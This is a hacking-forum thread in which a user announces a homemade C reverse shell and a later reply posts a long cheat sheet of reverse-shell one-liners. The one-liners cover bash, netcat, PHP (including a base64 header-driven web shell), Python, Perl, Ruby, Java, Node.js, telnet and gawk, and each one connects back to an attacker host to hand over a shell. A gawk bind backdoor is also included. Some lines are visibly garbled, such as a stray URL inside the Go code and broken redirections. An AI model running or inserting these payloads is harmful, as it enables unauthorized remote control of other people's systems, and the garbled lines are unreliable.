Open Source Reverse Shell

Red_Joker · August 10, 2017, 2:51pm

Ok, so I’ve coded a very basic reverse shell that I’ve now decided to allow any member to access and view the code, but before I post the code I gotta thank @0x00pf for his awesome tutorial and @Joe_Schmoe for STELF which inspired me to code this shell. I’m trying to add functionality to my shell, but I’m a 1337 Skid haxor. I’m still learning but thanks to this community and their patience especially @_py and of course @pry0cc plus many others which helped me and answered my really really really dull questions. I’ve learned a lot coding this shell especially how file descriptors and sockets work. Thank you all that have helped me out quite a bit!

Now the code is written in C and I’ve added comments to any that are interested in how it all works. To compile simply do,
gcc reverse_shell.c -o reverse_shell

and for the handler same thing,
gcc handler.c -o handler

The file named shell.c is actually a bind shell which I accidentally coded and just shows how stupid I can be, but I’ve decided to keep it just in case I and anyone else finds it useful. I hope this becomes useful for anyone that is interested. If anyone wants to help with the development of the shell please request access. Thank you!

Cheers!

operatorequals · August 10, 2017, 3:37pm

Are we all reverse shelling in this place?

Red_Joker · August 10, 2017, 3:39pm

Reverse Shell is more reliable than a bind shell because of Firewalls. Most Firewalls will actually not allow you to bind to the port that a bind shell needs which is why reverse shell are ideal because of the fact that they “call home”.

operatorequals · August 10, 2017, 3:40pm

Oh man! If you like those concepts the reverse DNS and ICMP shells will get you wet…

hkh4cks · August 11, 2017, 2:26pm

Awesome Stuff!! Thanks for sharing

C_J · March 29, 2022, 11:03pm

Here is what I found:

Bash Reverse Shells

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

socat Reverse Shell

Source: @filip_dragovic

socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

PHP Reverse Shell

A useful PHP reverse shell:

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

Another PHP reverse shell (that was submitted via Twitter):

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

Base64 encoded by @0xInfection:

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Netcat Reverse Shell

Useful netcat reverse shell examples:

Don’t forget to start your listener, or you won’t be catching any shells

nc -lnvp 80

nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

A reverse shell submitted by @0xatul which works well for OpenBSD netcat rather than GNU nc:

mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Node.js Reverse Shell

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

Source: @jobertabma via @JaneScott

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

Gawk one liner rev shell by @dmfroberson:

gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

I hope you found this interesting!